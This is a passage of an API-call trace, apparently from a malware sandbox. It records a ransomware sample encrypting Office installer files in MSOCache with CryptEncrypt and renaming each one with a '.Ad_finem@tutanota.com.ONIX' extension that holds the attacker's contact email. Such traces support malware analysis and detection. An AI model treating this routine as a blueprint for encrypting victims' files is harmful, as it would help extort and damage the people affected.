lpNumberOfBytesRead=0x367f44c*=0x387e00, lpOverlapped=0x0) returned 1 [0104.489] UnlockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x387e00, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.489] CloseHandle (hObject=0x488) returned 1 [0104.490] GetProcessHeap () returned 0x410000 [0104.490] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0104.490] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0104.495] GetProcessHeap () returned 0x410000 [0104.496] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0104.496] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0104.496] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0104.496] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0104.496] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7c27050, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15b5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeMUI.xml", cAlternateFileName="OFFICE~2.XML")) returned 1 [0104.496] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.496] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.496] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0104.496] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.496] GetLastError () returned 0x0 [0104.496] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x488 [0104.496] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0104.496] LockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x15b5, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.496] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.497] ReadFile (in: hFile=0x488, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0104.498] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.498] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.498] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0104.498] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0104.498] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", dwFileAttributes=0x80) returned 1 [0104.499] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 77 [0104.499] GetProcessHeap () returned 0x410000 [0104.499] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10a) returned 0x467908 [0104.499] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" [0104.499] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0104.499] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=5557) returned 1 [0104.499] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x15b5 [0104.499] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0104.499] GetProcessHeap () returned 0x410000 [0104.499] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0104.499] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0104.499] WriteFile (in: hFile=0x488, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0104.501] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0104.502] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0104.503] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15b5) returned 0x4d8b68 [0104.503] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x15b5) returned 0x4da128 [0104.503] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.503] ReadFile (in: hFile=0x488, lpBuffer=0x4d8b68, nNumberOfBytesToRead=0x15b5, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d8b68*, lpNumberOfBytesRead=0x367f44c*=0x15b5, lpOverlapped=0x0) returned 1 [0104.504] SetFilePointer (in: hFile=0x488, lDistanceToMove=-5557, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.504] WriteFile (in: hFile=0x488, lpBuffer=0x4da128*, nNumberOfBytesToWrite=0x15b5, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4da128*, lpNumberOfBytesWritten=0x367f44c*=0x15b5, lpOverlapped=0x0) returned 1 [0104.505] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d8b68 | out: hHeap=0x410000) returned 1 [0104.505] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4da128 | out: hHeap=0x410000) returned 1 [0104.505] UnlockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x15b5, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.505] CloseHandle (hObject=0x488) returned 1 [0104.507] GetProcessHeap () returned 0x410000 [0104.507] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0104.507] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0104.511] GetProcessHeap () returned 0x410000 [0104.511] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0104.511] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0104.511] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0104.511] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0104.511] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeMUISet.msi", cAlternateFileName="OFFICE~1.MSI")) returned 1 [0104.511] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.511] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.511] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0104.511] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.511] GetLastError () returned 0x0 [0104.511] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x488 [0104.511] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0104.512] LockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0xd4200, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.512] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.512] ReadFile (in: hFile=0x488, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0104.513] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.513] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.513] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0104.513] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0104.513] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi", dwFileAttributes=0x80) returned 1 [0104.514] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 80 [0104.514] GetProcessHeap () returned 0x410000 [0104.514] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x110) returned 0x467908 [0104.514] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" [0104.514] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0104.514] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=868864) returned 1 [0104.514] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0xd4200 [0104.514] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0104.514] GetProcessHeap () returned 0x410000 [0104.514] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0104.514] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0104.514] WriteFile (in: hFile=0x488, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0104.515] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0104.558] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0104.559] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd4200) returned 0x2680020 [0104.559] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xd4200) returned 0x2b30020 [0104.559] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.559] ReadFile (in: hFile=0x488, lpBuffer=0x2680020, nNumberOfBytesToRead=0xd4200, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2680020*, lpNumberOfBytesRead=0x367f44c*=0xd4200, lpOverlapped=0x0) returned 1 [0104.609] UnlockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0xd4200, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.609] CloseHandle (hObject=0x488) returned 1 [0104.610] GetProcessHeap () returned 0x410000 [0104.610] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0104.610] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0104.612] GetProcessHeap () returned 0x410000 [0104.612] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0104.612] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0104.612] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0104.612] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b40 | out: hHeap=0x410000) returned 1 [0104.612] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OfficeMUISet.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0104.612] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0104.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425278 [0104.612] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x4588e0 [0104.612] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425278 | out: hHeap=0x410000) returned 1 [0104.612] GetLastError () returned 0x0 [0104.612] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x488 [0104.613] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2a0000 [0104.613] LockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x333, nNumberOfBytesToLockHigh=0x0) returned 1 [0104.613] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0104.613] ReadFile (in: hFile=0x488, lpBuffer=0x2a0000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x2a0000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0104.615] SetFilePointerEx (in: hFile=0x488, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0104.615] VirtualFree (lpAddress=0x2a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0104.615] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0104.615] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0104.615] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", dwFileAttributes=0x80) returned 1 [0104.615] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 80 [0104.616] GetProcessHeap () returned 0x410000 [0104.616] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x110) returned 0x467908 [0104.616] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" [0104.616] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0104.616] GetFileSizeEx (in: hFile=0x488, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=819) returned 1 [0104.616] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x333 [0104.616] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0104.616] GetProcessHeap () returned 0x410000 [0104.616] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x4d6b80 [0104.616] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x4d6b80*, pdwDataLen=0x367f414*=0x100) returned 1 [0104.616] WriteFile (in: hFile=0x488, lpBuffer=0x4d6b80*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b80*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0104.618] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0104.619] WriteFile (in: hFile=0x488, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0104.620] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x333) returned 0x46a0f0 [0104.620] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x333) returned 0xf50048 [0104.620] SetFilePointer (in: hFile=0x488, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.620] ReadFile (in: hFile=0x488, lpBuffer=0x46a0f0, nNumberOfBytesToRead=0x333, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x46a0f0*, lpNumberOfBytesRead=0x367f44c*=0x333, lpOverlapped=0x0) returned 1 [0104.621] SetFilePointer (in: hFile=0x488, lDistanceToMove=-819, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.621] WriteFile (in: hFile=0x488, lpBuffer=0xf50048*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0xf50048*, lpNumberOfBytesWritten=0x367f44c*=0x333, lpOverlapped=0x0) returned 1 [0104.622] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46a0f0 | out: hHeap=0x410000) returned 1 [0104.622] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0xf50048 | out: hHeap=0x410000) returned 1 [0104.622] UnlockFile (hFile=0x488, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x333, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0104.622] CloseHandle (hObject=0x488) returned 1 [0104.623] GetProcessHeap () returned 0x410000 [0104.623] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b80 | out: hHeap=0x410000) returned 1 [0104.623] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0104.625] GetProcessHeap () returned 0x410000 [0104.626] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0104.626] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0104.626] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0104.626] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2b40 | out: hHeap=0x410000) returned 1 [0104.626] FindNextFileW (in: hFindFile=0x48ebf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8b16200, ftCreationTime.dwHighDateTime=0x1cac190, ftLastAccessTime.dwLowDateTime=0xc8b16200, ftLastAccessTime.dwHighDateTime=0x1cac190, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2ed80, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="osetupui.dll", 